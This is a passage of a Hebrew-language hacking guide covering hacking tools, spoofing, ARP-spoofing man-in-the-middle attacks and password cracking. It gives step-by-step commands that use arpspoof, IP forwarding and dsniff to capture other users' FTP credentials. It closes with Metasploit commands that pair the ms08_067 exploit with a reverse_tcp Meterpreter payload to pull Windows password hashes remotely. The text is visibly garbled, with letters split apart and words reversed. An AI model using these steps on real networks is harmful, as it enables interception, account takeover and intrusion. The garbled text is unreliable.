‫ל חיפו ש א חריציאות כדי ל בדו ק שערים שיו בי לו אותם היי שר למער כת מ ח ש בים ממו קדת‪ .‬כ לי זה נמצא ב שימו ש נפוץ גם ע לידי מהנד סי מער כת‬
‫ומנה לי מער כת כדי ל בדו ק פגיעויות אפ שריות במער כות שהם מ טפ לים בהן‪.‬‬
‫ה כ לי הזה הוא קוד פתו ח וניתן לה שתמ ש בו ע ל פני פ ל טפורמות‪ ,‬והוא זו כה ל ש ב חים ע ל היותו א חד ה כ לים היעי לים ביותר לפריצה ש קיימים‬
‫ב שו ק‪.‬‬
‫‪ 2.‬קא לי לינו ק ס‬
‫יי שום זה‪ ,‬שהו ש ק ב שנת ‪2015,‬הוא א חד המועדפים ע ל הא קרים בג ל ל שפע הת כונות‪ .‬ער כת כ לים זו הממו קדת בא ב ט חה מאפ שרת לך‬
‫להפעי ל אותהי שירות מת ק לי טור או דרך ‪ USB,‬ל לא צורך בהת קנה כ ל שהי‪.‬‬
‫ער כת כ לים זו מ כי לה את רו ב הממ ש קים הדרו שים לך לפריצה‪ ,‬ה כו ל לתיצירת ר שתות מזויפות‪ ,‬הודעות זיוף ואפי לו סי סמאות ‪ WiFi‬לפיצו ח‪.‬‬
‫‪ 3.‬קין וה ב ל‬
‫‪Cain & Abel‬הוא א חד מער כי הפריצה היעי לים ביותר הפוע לים הי ט ב מו ל מער כות ההפע לה ש ל מי קרו סופ ט‪ .‬כ לי זה מאפ שר לך ל ש חזר‬
‫סי סמאות לר שת א ל חו טית‪ ,‬סי סמאות ל ח ש בונות מ שתמ ש ו לה שתמ ש ב כמה שי טות כו ח ג ס ב כ ל הנוגע לפיצו ח סי סמאות‪ .‬אתהי כו ל גם‬
‫לה שתמ ש בו כדי לה ק לי ט הפע לות ש ל שי חות ‪VoIP.‬‬
‫‪ 4.‬סווי טת בורפ‬
‫‪Burp Suite‬הוא א חד ה כ לים ה חיוניים ביותר ש בהם אתהי כו ל לה שתמ ש כא שר אתה רוצה למפות נ קודות תורפה באתר‪ .‬כ לי זה מאפ שר לך‬
‫ל ב חון כ ל קו בץ ‪ cookie‬שנמצא באתר‪ ,‬וגם להת חי ל חי בורים בתוךיי שומי אתר‪.‬‬
‫‪5. Ettercap‬‬
‫ה כ לי הזהיעי ל ב כ ל הנוגע להפע לת אדם באמצע הת קפות‪ ,‬שנועד לגרום ל שתי מער כות שונות להאמין שהן‬
‫מת ק שרות זו עם זו‪ ,‬א ב ל הא קר מע ביר ב סתר מ סר א חר לא חר‪ .‬כ לי זהיעי ל במניפו לציה או גני בת ע ס קאות או‬
‫הע ברת נתונים בין מער כות‪ ,‬או לצותת ל שי חה‪.‬‬
‫‪ 6.‬ג'ון המר ט ש‬
‫זהו א חד מפצ חי ה סי סמאות ה טו בים ביותר ש ל כו ח ג ס המ שתמ שים במת קפת המי לון‪ .‬בעוד שרו ב ההא קרים ע שויים‬
‫ל ח שו ב ש ט ק טי קות כו ח ג ס כו ל לותיותר מדי זמן לפיצו ח סי סמה‪,‬ידוע ש‪the Ripper nhoJ-‬הוא א חד ה כ לים‬
‫היעי ליםיותר ב כ ל הנוגע ל ש חזור סי סמאות מוצפנות‪.‬‬
‫‪7. Metasploit‬‬
‫‪Metaspoit‬זו כה להער כה ר בה ב קר ב הא קרים מ כיוון שהוא כ לייעי ל ב כ ל הנוגע לזיהוי בעיות א ב ט חה אפ שריות‬
‫וגם לאימות הפגות ש ל פגיעויות מער כת‪ .‬זהו גם א חד מ כ לי ההצפנה ה טו בים ביותר ע בור הא קרים מ כיוון שהוא גם‬
‫יעי ל כ שמדו בר במי סוך זהויות ומי קומים ש ל הת קפה‪.‬‬
‫‪8. Wireshark and Aircraft-ng‬‬
‫כ לים א לה מ שמ שיםי חד כדי לזהות חי בורים א ל חו טיים ו לפרוץ מזהי מ שתמ ש ו סי סמאות ב חי בור ‪WiFi. Wireshark‬‬
‫מ שמ ש כר חר ח מנות‪-Aircraft-ng ,‬ו מ שמ ש כ ח בי לת ל כידת מנות שתאפ שר לך גם לה שתמ ש במגוון כ לים א חרים‬
‫כדי לנ טר את א ב ט חת ‪-WiFi.‬ה‬
‫כעת‪ ,‬לא חר שי ש לך ר שימה ש ל כ לים ש בהם תו כ ל לה שתמ ש כדי לתרג ל פריצה ו כדי לג לות גם נ קודות תורפה במער כת‬
‫מ ש לך‪ ,‬כעת תו כ ל ל חפור עמו קיותר לתוך ט ק טי קות הפריצה הנפוצות ביותר ו לג לות כיצד הן נע שות‪.‬‬
‫פר ק ‪6:‬איך ל ש טות במ טרות‬
‫הא קר טו ב הוא חו קר מומ חה; הוא מ סוג ל להי שאר לא מזוהה ע לידי שהוא נמצא מת חת לרדאר ש ל מנה לי ר שת ע לידי‬
‫הת חזות למי שהו א חר‪ .‬כדי שההא קריע שה זאת‪ ,‬הוא עו שה שימו ש ב ט כני קות זיוף או הת חזות‪.‬‬
‫זיוף‬
‫זיוף‪ ,‬כפי ש כ בר קראתם בפר ק ה קודם‪ ,‬מתיי ח ס ל ט כני קת ההונאה ש בה הא קר מ ח קה או מעמיד פנים שהוא אדם א חר‪,‬‬
‫ארגון‪ ,‬תו כנה או אתר אינ טרנ ט א חר‪ .‬זה בא מתוך כוונה לע קוף את פרו טו קו לי הא ב ט חה ש ל המ טרה ע ל מנת ל ק ב ל גי שה‬
‫למידע שהא קר רוצה ל ק ב ל‪ .‬לה לן כמה מ ט כני קות הזיוף הנפוצות ביותר שהא קרים מ שתמ שים בהן‪:‬‬
‫‪1.‬זיוף ‪IP‬‬
‫ט כני קה זו נע שית כדי לה סוות את כתו בת ה‪ PI-‬ש ל מ ח ש ב שההא קר מ שתמ ש בו כדי לרמות ר שת ל ח שו ב‬
‫שמ שתמ ש לגי טימי מת ק שר עם מ ח ש ב ממו קד‪ .‬ל שם כך‪ ,‬הא קר מ ח קה כתו בת ‪IP‬או טוו ח א חר כדי לעמוד‬
‫ב קרי טריונים ש ל כתו בת ה‪ PI-‬שנ ק בעו ע לידי מנה ל ר שת‪.‬‬
‫ט כני קת פריצת זיוף זו פוע לת ע לידי מציאת כתו בת ‪ IP‬ש בה מ שתמ ש מאר ח מהימן‪ .‬לא חר שתע שה זאת‪ ,‬תו כ ל‬
‫ל שנות את כותרות ה ח בי לות כדי לה טעות את הר שת להאמין שהיא מגיעה ממ שתמ ש מור שה‪ .‬בדרך זו‪ ,‬אתהי כו ל‬
‫ל ש לו ח מנות מזי קות לר שת ממו קדת‪ ,‬מ ב לי שיוותרו א ליך‪.‬‬
‫‪2.‬זיוף ‪DNS‬‬
‫זיוף ‪ DNS‬פוע ל ע לידי שימו ש ב כתו בת ה‪ PI-‬ש ל אתר אינ טרנ ט כדי ל ש לו ח מי שהו לאתר זדוני ש בו הא קרי כו ל‬
‫ב ק לות לא סוף מידע פר טי או אי שורי מ שתמ ש‪ .‬הת קפת האי ש באמצע מאפ שרת לך לת ק שר עם מ טרה תמימה‬
‫ל ח שו ב שהוא נ כנ ס לאתר שהוא חיפ ש‪ ,‬ואז לאפ שר להא קר ל ק ב ל באופן חופ שי פר טי ח ש בון שהמ שתמ ש הזהיזין‬
‫באתר ש קרי‪.‬‬
‫כדי שזהיע בוד‪ ,‬ההא קר צריך להיות באותו ‪ LAN‬כמו היעד‪ .‬ע ל מנת לה שיג גי שה לאותו ‪LAN,‬הא קרי כו ל פ שו ט‬
‫ל חפ ש סי סמה ח ל שה במ כונה שמ חו ברת לאותה ר שת‪ ,‬ד בר שניתן אפי לו לע שות מר חו ק‪ .‬ברגע שזה נע שה‬
‫בהצ ל חה‪ ,‬הא קרי כו ל להפנות מ שתמ שים ל ל כת לאתר אינ טרנ ט מזויף ו לפ ק ח ע ל כ ל הפעי לויות שהםיע שו שם‪.‬‬
‫‪3.‬זיוף באימיי ל‬
‫זיוף דוא" ל שימו שי מאוד כא שר מדו בר ע ל ע קיפת שירותי א ב ט חה המוע ס קים ב שירות דוא" ל‪ .‬המ שמעות היא‬
‫ש כא שר כתו בת דוא" ל מזויפת‪ ,‬שירות הדואר הא ל ק טרונייזהה כ ל דואר שנ ש ל ח מ ח ש בון מזויף כ לגי טימי ו לאיופנה‬
‫לתי בת הדואר הז ב ל‪ .‬ט כני קה זו מאפ שרת להא קר ל ש לו ח מיי לים עם ק בצים מצורפים זדוניים למ טרה מ סוימת‪.‬‬
‫‪4.‬זיוף מ ספר ט לפון‬
‫זיוף מ ספרי ט לפון מ שתמ ש בדרך כ ל ל באזורי חיוג או מ ספרי ט לפון כוז בים כדי לה סוות את המי קום או הזהות ש ל‬
‫הא קר‪ .‬ט ק טי קה זו מאפ שרת להא קרים לה קי ש בהצ ל חה ע ל הודעות דואר קו לי ש ל היעדים ש להם‪ ,‬ל ש לו ח הודעות‬
‫ט ק ס ט באמצעות מ ספר מזויף‪ ,‬או לה טעותיעד שממנו ה שי חה‬
‫מגיע ‪ -‬כ ל ה ט ק טי קות הא להיעי לות מאוד כ שמני חים את ה ב סי ס להת קפות הנד סה ח ברתית‪.‬‬
‫הנז ק ש ל הת קפות הת חפו שות או זיוף נעוץ בעו בדה שהן לא מזוהות ב ק לות ע לידי רו ב מנה לי הר שת‪ .‬ה ח ל ק הגרוע ביותר‬
‫הוא שמנה לי ר שת ופרו טו קו לי הא ב ט חה המות קנים מאפ שרים למ שתמ שים זדוניים ליצור אינ טרא קציה עם מ שתמ שים‬
‫א חרים דרך הר שת ואפי לו לתפע ל‪ ,‬לעצור או לה חדיר זרם נתונים למער כת הממו קדת‪ .‬מ כיוון שהא קר שמ סוג ל ל חדור‬
‫לר שתי כו ל ב ק לות לה קים חנות בא חד המאר חים או במ כ שירים מניפו לציות במער כת‪ ,‬ק ל לו ל בצע הת קפות אדם באמצע‪.‬‬
‫הת קפות אדם‪ -‬באמצע‬
‫הת קפת אדם באמצע הופ כת לפעו לת מע ק ב הגיונית מאוד ע בור הא קר פ לי לי לא חר שהוא מ בצע בהצ ל חה מת קפת זיוף‪.‬‬
‫בעוד ש ח ל ק מהא קרים פ סי בייםי סתפ קו ב כך שהם פ שו טי כו לים לצפות בנתונים הדרו שים לו ו להימנע ממניפו לציה תוך כדי‬
‫האזנה למאר ח פגיע‪ ,‬ח ל קם ע שויים לרצות ל בצע הת קפה א ק טי בית מיד לא חר שהצ לי חו ל בצע הת קפת זיוף בהצ ל חה‪.‬‬
‫מת קפת ‪man-in the middle‬י כו לה להת בצע כא שר הא קר מ בצע זיוף ‪ARP,‬הנע שה ע לידי ש לי חת הודעות שווא ש ל‬
‫‪Address Resolution Protocol,‬או ‪ARP,‬דרך הר שת המ קומית ש חדרה א ליה‪ .‬כא שר נ ש לפו בהצ ל חה‪ ,‬הודעות ה‪PRA-‬‬
‫המזויפות מאפ שרות ל קי שור מוצ ל ח ש ל כתו בת ה‪ CAM-‬ש ל ההא קרים ל כתו בת ‪ IP‬ש ל מ שתמ ש לגי טימי או שרת ש לם בר שת‬
‫ממו קדת‪ .‬ברגע שההא קריו כ ל ל ק שר את כתו בת ה‪ CAM-‬ש לו ל כתו בת ‪ IP‬לגי טימית‪ ,‬ההא קריו כ ל ל ק ב ל את כ ל הנתונים‬
‫שמ שתמ שים א חרים דרך הר שת שו ל חים ל כתו בת ה‪ PI-‬ש בה הוא מ שתמ ש‪ .‬מ כיוון ש כ ברי ש לו גי שה ל כ ל הנתונים שהמ שתמ ש‬
‫הפרוץ )ה בע לים ש ל כתו בת ה‪ (PI-‬מזין ו למידע שהוא מ ק ב ל בר שת‪ ,‬ההא קרי כו ל ל ב חור ל בצע את הפעו לות ה באות במה לך‬
‫ס שן זיוף ש ל ‪ARP:‬‬
‫‪1.‬טיפת הפע לה ‪-‬זה מאפ שר להא קר לה שתמ ש ב‪ PRA-‬המזויף כדי לגנו ב‬ ‫ח‬
‫מזהה הפע לה ש ל מ שתמ ש‪ ,‬ו לא חר מ כן לה שתמ ש באי שורים א לה במועד מאו חריותר כדי ל ק ב ל גי שה ל ח ש בון‪.‬‬
‫‪2.‬‬ ‫הת קפת מניעת שירות –הת קפה זוי כו לה להיע שות כא שר זיוף ‪ARP‬נע שה‬
‫כדי ל ק שר מ ספר כתו בות ‪ IP‬מרו בות ל כתו בת ‪ MAC‬ש ל מ כ שיר ממו קד‪ .‬מה ש קורה ב סוג זה ש ל הת קפה הוא ש כ ל‬
‫הנתונים שנ ש ל חים כ בי כו ל ל כתו בות ‪IP‬א חרות מופנים במ קום זאת למ כ שיר בודד‪ ,‬מה שע לו ל לגרום לעומ סיתר‬
‫ש ל נתונים‪ .‬תו כ ל לדעתיותר ע ל הת קפות ‪ DoS‬בפר ק מאו חריותר‪.‬‬
‫הת קפת אי ש‪ -‬באמצע ‪-‬ההא קר מעמיד פנים שהוא לא קיים בר שת‪ ,‬ו לא חר מ כן‬ ‫‪3.‬‬
‫מייר ט או מ שנה הודעות שנ ש ל חות בין שני קור בנות אויותר‪.‬‬
‫הנה איך הא קר ע שוי ל בצע זיוף ‪ ARP‬כדי ל בצע הת קפת אדם באמצע באמצעות כ לי שנ קרא ‪ Backtrack,‬ער כת כ לים‬
‫לפריצה הדומה ל קא לי לינו ק ס‪:‬‬
‫ש ל ב ‪ 1:‬ר חר ח את הנתונים שאתה צריך‬
‫ניתן לע שות זאת ע לידי שימו ש ב כ לים ‪-tcpdump.‬ו ‪ Wireshark, dsniff‬ע לידי הפע לת ה כ לים הא לה‪ ,‬אתהי כו ל‬
‫לראות את כ ל התע בורה שאתהי כו ל להת ח בר א ליה דרך ר שתות א ל חו טיות או קוויות‪.‬‬
‫ש ל ב ‪2:‬ה שתמ ש במתאם א ל חו טי וה כנ ס אותו למצ ב צג‬
‫כא שר אתה מצי ב את המתאם הא ל חו טי או ‪-NIC‬ה ש לך למצ ב מוני טור‪ ,‬תו כ ל ל ק לו ט את כ ל התע בורה הזמינה ל חי בור‬
‫ש לך‪ ,‬גם את א לה שאינן מיועדות ל כתו בת ה‪ PI-‬ש לך‪ .‬אם אתה מ חו בר לר שתות ר כזת‪ ,‬אתהי כו ל לא סוף את התע בורה‬
‫שאתה צריך ל לא כ ל קו שי‪.‬‬
‫עם זאת‪ ,‬אם אתם מת כננים ל חדור למער כת מיתוגית‪,‬יית כן שתצ טר כו ל ב חור ב ט ק טי קה א חרת‪ ,‬ש כן מתגים מוו סתים‬
‫את התע בורה ומ ב טי חים שמנות נתונים ספציפיות נ ש ל חות ל כתו בות ‪MAC‬או כתו בות ‪ IP‬ספציפיות‪.‬‬
‫אם אתה רוצה לע קוף מתגים‪ ,‬או לפ חות לדעת אי לו סוגי מידע נ ש ל חים למ שתמ שים א חרים‪ ,‬אתהי כו ל לנ סות ל שנות‬
‫את הער כים ב ט ב לת ‪ CAM‬שממפה כתו בות ‪ IP‬ו‪ CAM-‬ש שו ל חות מידע זה לזה‪ .‬אם ת שנה את הער כים‪ ,‬תו כ ל לה שיג‬
‫בהצ ל חה את התע בורה המיועדת למי שהו א חר‪ .‬ל שם כך‪ ,‬ע ליך ל בצע הת קפת זיוף ‪ARP.‬‬
‫ש ל ב ‪3:‬הפע ל ‪Backtrack‬‬
‫ברגע שאתה מ סוג ל למ שוך את ‪ Backtrack‬למע לה‪ ,‬מ שוך למע לה ש לו שה מ סופים‪ .‬לא חר מ כן‪ ,‬וע שה את הפעו לות ה בא‬
‫‪1.‬‬ ‫ה ח לף את כתו בת ה‪ CAM-‬ש ל ה ל קו ח שא ליו אתה ממ קד ב כתו בת ה‪ CAM-‬ש לך‪.‬‬

‫הזן את המ חרוזת ה באה כדי לומר ל ל קו ח ש כתו בת ה‪ CAM-‬ש לך היא ה שרת‪:‬‬
‫‪ ]arpspoof‬ל קו ח ]‪ ]IP‬שרת ]‪IP‬‬
‫‪2.‬‬ ‫הפוך את ה סדר ש ל כתו בות ה‪ PI-‬במ חרוזת ה קודמת ש בה ה שתמ שת‪ .‬זהיגיד‬
‫ל שרת שהמ ח ש ב ש לך הוא ה ל קו ח‪.‬‬
‫‪3.‬‬ ‫כעת כ שאתה מעמיד פנים שאתה גם ה שרת וגם ה ל קו ח‪ ,‬כעת תצ טרך להיות‬
‫מ סוג ל ל ק ב ל את ה ח בי לות מה ל קו ח ואז להע ביר אותם ל שרת‪ ,‬וגם לע שות הפוך‪.‬‬
‫אם אתה מ שתמ ש ב לינו ק ס‪ ,‬אתהי כו ל לע שות שימו ש בת כונה המו בנית ש לו ב שם ‪ ip_forward,‬שי כו לה‬
‫לאפ שר לך להע ביר מנות שאתה מ ק ב ל‪ .‬לא חר שתפעי ל את זה‪ ,‬תו כ ל להע ביר את ה ח בי לות באמצעות‬
‫‪ ipforwarding‬ע לידי הזנת פ קודה זו ‪ -Backtrack:‬ב‬
‫‪echo 1 > /proc/sys/net/ipv4/ip_forward‬‬
‫לא חר שתזין פ קודה זו‪ ,‬המער כת ש לך תמו קם בדיו ק באמצע ה ל קו ח וה שרת‪ .‬זה אומר שאתהי כו ל כעת ל ק ב ל‬
‫ו להע ביר נתונים שנ ש ל חו בין ה ל קו ח ל שרת‪.‬‬
‫‪4.‬‬ ‫ה שתמ ש ‪ -Dsniff‬ב כדי ל בדו ק את התע בורה‬
‫כעת‪ ,‬כא שר אתהי כו ל ל ק ב ל את כ ל התע בורה הנ ש ל חת א ל ה ל קו ח ומה שרת וממנו‪ ,‬תו כ ל למצוא את כ ל‬
‫התע בורה הזמינה‪ .‬כדי לע שות זאת‪ ,‬הפע ל כ לי סניפר ‪ -Backtrack‬ב ע לידי הזנת הפ קודה ‪ "dsniff".‬לא חר‬
‫שתע שה זאת‪ ,‬תראה שה‪ ffinsd-‬מופע ל ומאזין לתע בורה הזמינה‪.‬‬
‫‪5.‬‬ ‫תפו ס את האי שורים או את הנתונים שאתה צריך ב‪ptf-‬‬

‫כעת‪ ,‬כ ל מה שאתה צריך לע שות הוא להמתין עד שה ל קו חיי כנ סי שירות ל שרת ‪-ftp.‬ה כ שזהי קרה‪ ,‬תראה‬
‫מיד מה שם המ שתמ ש או ה סי סמה ש לו‪.‬‬
‫מ כיוון שגם מ שתמ שים וגם מנה לי מער כת מ שתמ שים באותם אי שורים ב כ ל ה שירותים או מער כות המ ח ש ב‪,‬‬
‫אתהי כו ל לה שתמ ש באי שורים שאתהי כו ל ל ק ב ל כדי להי כנ ס‪.‬‬
‫פר ק ‪ 7:‬פריצת סי סמאות‬
‫סי סמאות הן בין המ טרות הנפוצות ביותר ש ל הא קרים פ שו ט מ כיוון שפריצת סי סמאות היא בין ה טרי קים ה ק לים ביותר‬
‫ל ביצוע‪ .‬בעוד שרו ב האנ שים חו ש בים ש ק שה לפיצו חיצירת בי טויי סי סמה ארו כים‪ ,‬הא קרים מודעים ל כך שרו ב האנ שים בדרך‬
‫כ ל ל מתע למים מהגנה ע ל אי שורי המ שתמ ש ש להם‪.‬‬
‫פר טי הת ח ברות סודיים‪ ,‬כגון סי סמאות‪ ,‬הם בין ה חו ליות ה ח ל שות ביותר בא ב ט חה ט כנו לוגית מ כיוון שזוהי ת כונת הא ב ט חה‬
‫המ סתמ כת ר ק ע ל סודיות‪ .‬ברגע שה סוד הזה דו לף ה חוצה‪ ,‬כ ל הא חריות נמצאת מ חוץ ל ח לון והמער כות נפגעות ב ק לות‪.‬‬
‫אם אתה נ כנ סי שירות לתודעתו ש ל תו קף‪ ,‬אתה ע שוי לה בין שי ש הר בה דר כים לדעת מהי ה סי סמה ש ל מ שתמ ש מ כיוון‬
‫שי ש להיותר מדי פגיעות‪ .‬ה בעיה הגדו לה ביותר ש ל ה סתמ כות ע ל סי סמאות לא ב ט חה היא ש לעתים קרו בות מ שתמ ש‬
‫מ ספ ק את פר טי המ שתמ ש ש לו גם למ שתמ שים א חרים‪ .‬בעוד שמ שתמ ש ע לו ל למ סור את ה סי סמה ש לו ב כוונה או ש לא‬
‫ב כוונה‪ ,‬ברגע שה קוד ה סודי הזהיצא‪ ,‬אין שום דרך לדעת מי עודיודע מה זה‪ .‬ב ש ל ב זה‪ ,‬ח שו ב לדעת ש כא שר מי שהויודע‬
‫מהי ה סי סמה ש ל מ שתמ ש‪ ,‬זה לא הופך את אותו אדם למ שתמ ש מור שה בר שת‪.‬‬
‫איך לפצ ח סי סמאות‬
‫אם הא קר לאי כו ל לדעת את ה סי סמה ש ל מ שתמ ש באמצעות ה ס קה‪ ,‬הנד סה ח ברתית והת קפה פיזית )ע ל מנת לדון בהר ח בה בפר קים מאו חריםיותר(‪,‬‬
‫הואי כו ל במ קום זאת לה שתמ ש במ ספר כ לים לפיצו ח סי סמאות‪ ,‬כגון‪:‬‬
‫‪ 1. Cain & Abel -‬מ שמ ש לפיצו ח ‪ NT‬ו‪-Windows RDP. ML-‬ו ‪-Cisco IOS Hash, Radius Hash‬ו ‪(NTLM) LanManager Hash, Pic‬‬
‫– ‪ 2. Elmcomsoft Distributed Password Recovery‬פיצו ח סי סמאות ‪-PGP.‬ו ‪PKCS, Microsoft Office‬זהי כו ל ל שמ ש גם בפיצו ח‬
‫סי סמאות מ בוזרות ו ל ש חזר ‪ 10,000‬מ ח ש בים בר שת‪ .‬הוא גם עו שה שימו ש במאיץ ‪ GPU‬שי כו ל להג ביר את מהירות הפיצו ח ש לו עד פי ‪50.‬‬
‫– ‪ 3. Elcomsoft System Recovery‬מאפ ס סי סמאות ש ל ‪ Windows,‬מאפ ס את כ ל תפוגות ה סי סמאות ו כן‬

‫קו בע אי שורים מנה ליים‪.‬‬
‫‪ 4.‬ג'ון המר ט ש ‪ -‬פיצו ח סי סמאות גי בו ב ש ל ‪ Windows, Unix‬ו לינו ק ס‬
‫‪ 5. Ophcrack -‬עו שה שימו ש ב ט ב לאות ק שת בענן לפיצו ח סי סמאות ש ל ‪Windows‬‬
‫‪ 6. Pandora -‬פיצו ח סי סמאות מ שתמ ש לא מ קוונות או מ קוונות ע בור ח ש בונות ‪Novell Netware‬‬
‫‪ 7.‬ש חזור סי סמא מער כת פרוא ק טי בית ‪ -‬מ ש חזר כ ל סי סמה המאו ח סנת באופן מ קומי במער כת הפע לה ‪Windows.‬זה כו ל ל סי סמאות‬
‫ל כני סות‪ VPN, RAS, SYSKEY ,‬ואפי לו חי בורי ‪WEP‬או ‪WPA.‬‬
‫– ‪ 8. RainbowCrack‬פיצו ח ‪ MD5‬ו‪ LanManager hashes -‬באמצעות ט ב לת ‪rainbow.‬‬
‫שים ל ב ש ח ל ק מה כ לים ה ל לו ע שויים לדרו ש גי שה פיזית למער כת ש ברצונך לפרוץ‪ .‬באותה צורה‪ ,‬ז כור ש ברגע ש להא קר תהיה גי שה פיזית למער כת שאתה‬
‫מת כוון להגן‪ ,‬הואיו כ ל ל חפור ב כ ל ה ק בצים המוגנים ב סי סמה או מוצפנים שי ש לך‪ ,‬כ ל עודי ש לו את ה כ לים הנ כונים ‪.‬‬
‫כא שר בוד קים ט ק טי קות לפיצו ח סי סמאות‪ ,‬א חד הד ברים ה ח שו בים ביותר שאתה צריך לז כור הוא שה ט כני קה שאתה צריך ל בדו ק תהיה מ בו ס סת ע ל סוג‬
‫ההצפנה ש ל ה סי סמה שאתה צריך לפצ ח‪ .‬כמו כן‪ ,‬אם אתם בוד קים פריצות לפיצו ח סי סמאות‪,‬יית כן שתצ טר כו גם לז כור שמער כות מ סוימותי כו לות לנעו ל‬
‫מ שתמ שים מ שוי כים‪ ,‬מה שע לו ל לגרום למניעת שירות למ שתמ שים שמ שתמ שים בר שת‪.‬‬
‫הערות ע ל הצפנת סי סמה‬
‫סי סמאות‪ ,‬לא חריצירתן‪ ,‬מוצפנות באמצעות א לגוריתם גי בו ב חד כיווני‪ .‬סי סמאות הגי בו ב ה ל לו נתפ סות אז כמ חרוזות מוצפנות‪ .‬מה סי בות ה ברורות‪,‬‬
‫הגי בו בים שנוצרו אינם הפי כים‪ ,‬מה שהופך סי סמאות ב לתי אפ שריות לפענו ח‪ .‬אם אתה מנ סה לפצ ח סי סמאות במער כת הפע לה לינו ק ס‪,‬י ש דרגת‬
‫קו שי נו ספת לע שות זאת בג ל ל מידת הא קראיות הנו ספת ב סי סמאות מ כיוון שמער כת הפע לה זו מו סיפה "מ ל ח"‪ ,‬או ערך א קראי כדי להפוך סי סמאות‬
‫ליי חודיותיותר‪ .‬ו למנוע מ שני מ שתמ שים לה שיג את אותו ערך ‪hash.‬‬
‫עם זאת‪ ,‬אםי ש לך את ה כ לים הנ כונים‪ ,‬אתהי כו ל להפעי ל סוגים שונים ש ל הת קפות כדי לנ סות ל ש חזר או לפצ ח סי סמה‪ .‬הנה כמה מהם‪:‬‬
‫‪1.‬הת קפות מי לון‬
‫כפי שה שם מרמז‪ ,‬הת קפות א לו עו שות שימו ש במי לים הזמינות במי לון כנגד מאגר ה סי סמאות ש ל המער כת‪ .‬סוג זה ש ל הת קפה מ ק ל‬
‫ע ליך לג לות סי סמאות ח ל שות‪ ,‬או סי סמאות שעו שות שימו ש באיות ח לופי‪ ,‬כגון ‪ pa$$word‬לה ח ליף " סי סמה"‪ .‬כו חו ש ל כ לי הת קפה ש ל‬
‫מי לון מ בו ס ס ע ל כמות מי לות אוצר המי לים שהוא מ כי ל‪.‬‬
‫‪2.‬הת קפות ב כו ח ג ס‬
‫הת קפות א לו מ סוג לות לפצ ח כ ל סוג ש ל סי סמה ש כן היא עו שה שימו ש ב כ ל שי לו בי האותיות‪ ,‬התווים המיו חדים והמ ספרים עד לפיצו ח‬
‫ה סי סמה ש ל מ כ שיר‪.‬‬
‫עם זאת‪ ,‬ק ל לנ ח ש את הפגם ב ט כני קה זו ‪-‬זהי כו ל ל ק חת הר בה זמן כדי ל ח שוף סי סמה‪ ,‬במיו חד חז קה‪.‬‬
‫‪3.‬הת קפות ק שת בענן‬
‫הת קפות ק שת מעו לות לפיצו ח סי סמאות גי בו ב‪ ,‬ו סוגי הת קפות א להי כו לים לגרום לא חוזי הצ ל חה ג בוהיםיותר‪ .‬כ לים שעו שים שימו ש‬
‫בהת קפות ק שת בענןי כו לים גם לפצ ח סי סמאות מהריותר‪ ,‬בה שוואה ל כ לי ת קיפה במי לונים ו כ לי כו ח ג ס‪ .‬הפגם הי חיד ש ל סוג זה ש ל‬
‫הת קפה הוא שהואי כו ל ל ח שוף ר ק סי סמאות בע לות ‪14‬תווים או פ חות‪.‬‬
‫דר כים א חרות ל ח שוף סי סמאות‬
‫כפי שהוז כר קודם ל כן‪ ,‬הדרך ה ק לה ביותר לפצ ח סי סמה היא ל ק ב ל גי שה פיזית למער כת שאתה מנ סה לפרוץ‪ .‬אם אינך‬
‫מ סוג ל לע שות שימו ש ב כ לי פיצו ח במער כת‪ ,‬תו כ ל לה שתמ ש ב ט כני קות ה באות במ קום זאת‪:‬‬
‫‪ 1.‬רי שום ה ק שות‬
‫זוהי ב ק לות א חת ה ט כני קות היעי לות ביותר בפיצו ח סי סמאות‪ ,‬מ כיוון שהיא עו שה שימו ש במ כ שיר ה ק ל טה ש לו כד‬
‫ה ק שות תוך כדי ה ק לדתן במ ק לדת‪ .‬אתהי כו ל לה שתמ ש בתו כנת רי שום מ ק לדת‪ ,‬כגון ‪-Spector Pro,‬ו ‪Stealth‬‬
‫‪KeyLogger‬או חומרת רי שום מ ק לדת כגון ‪KeyGhost.‬‬
‫‪ 2.‬חיפו ש א חר א ח סון סי סמאות ח ל ש‬
‫י שיותר מדייי שומים ברו ב המ ח ש בים המא ח סנים סי סמאות באופן מ קומי‪ ,‬מה שהופך אותם לפגיעים מאוד לפריצה‪.‬‬
‫ברגע שי ש לך גי שה פיזית למ ח ש ב‪ ,‬תו כ ל לג לות ב ק לות סי סמאות פ שו ט ע לידי חיפו ש א חר פרצות א ח סון או שימו ש‬
‫ב חיפו שי ט ק ס ט‪ .‬אםיתמז ל מז ל כם‪ ,‬תו כ לו אפי לו למצוא סי סמאות מאו ח סנות באפ לי קציה עצמה‪.‬‬
‫‪ 3.‬סי סמאות ‪ BIOS‬ח ל שות‬
‫מ ח ש בים ר בים מאפ שרים למ שתמ שים לע שות שימו ש ב סי סמאות הפע לה ע ל מנת להגן ע ל הגדרות ה חומרה‬
‫הממו קמות ב ש ב בי ‪-CMOS‬ה ש להם‪ .‬עם זאת‪ ,‬אתהי כו ל ב ק לות לאפ ס את ה סי סמאות ה ל לו ע לידי ה ח לפת מג שר‬
‫בודד ב לו ח האם או ניתו ק סו ל לת ‪ CMOS‬מה לו ח‪ .‬אתהי כו ל גם לנ סות את מז לך ו ל חפ ש באינ טרנ ט אי שורי כני סה‬
‫למ שתמ ש ברירת מ חד ל ע בור סוגים שונים ש ל לו חות אם באינ טרנ ט‪.‬‬
‫‪4.‬תפו ס סי סמאות מר חו ק‬
‫אם גי שה פיזית למער כת או למי קומה ב לתי אפ שרית‪ ,‬אתה עדייןי כו ל לתפו ס סי סמאות המאו ח סנות מ קומית‬
‫במער כת הפוע לת ע ל מער כת הפע לה ‪ Windows‬ממי קום מרו ח ק ואפי לו לתפו ס את האי שורים ש ל ח ש בון מנה ל‬
‫המער כת‪ .‬אתהי כו ל לע שות זאת ע לידי ביצוע הת קפת זיוף ת חי לה‪ ,‬ו לא חר מ כן ניצו ל קו בץ ‪-SAM‬ה ב קו בץ הרי שום‬
‫ש ל המ ח ש ב הממו קד ע לידי ביצוע ה ש ל בים ה באים‪:‬‬
‫‪ 1.‬מ שוך את ‪ Metasploit‬וה ק לד את הפ קודה ה באה‪use exploit/windows/smb/ms08_067_netapi :‬‬

‫> ‪msf‬‬
‫‪ 2.‬לא חר מ כן‪ ,‬הזן את הפ קודה ה באה‪msf (ms08_067_netapi) > set payload :‬‬
‫‪/windows/meterpreter/reverse_tcp‬‬
‫לא חר שתע שה זאת‪Metaploit ,‬יראה לך שאתה צריך ל ק ב ל את כתו בת ה‪ PI-‬ש ל היעד‬

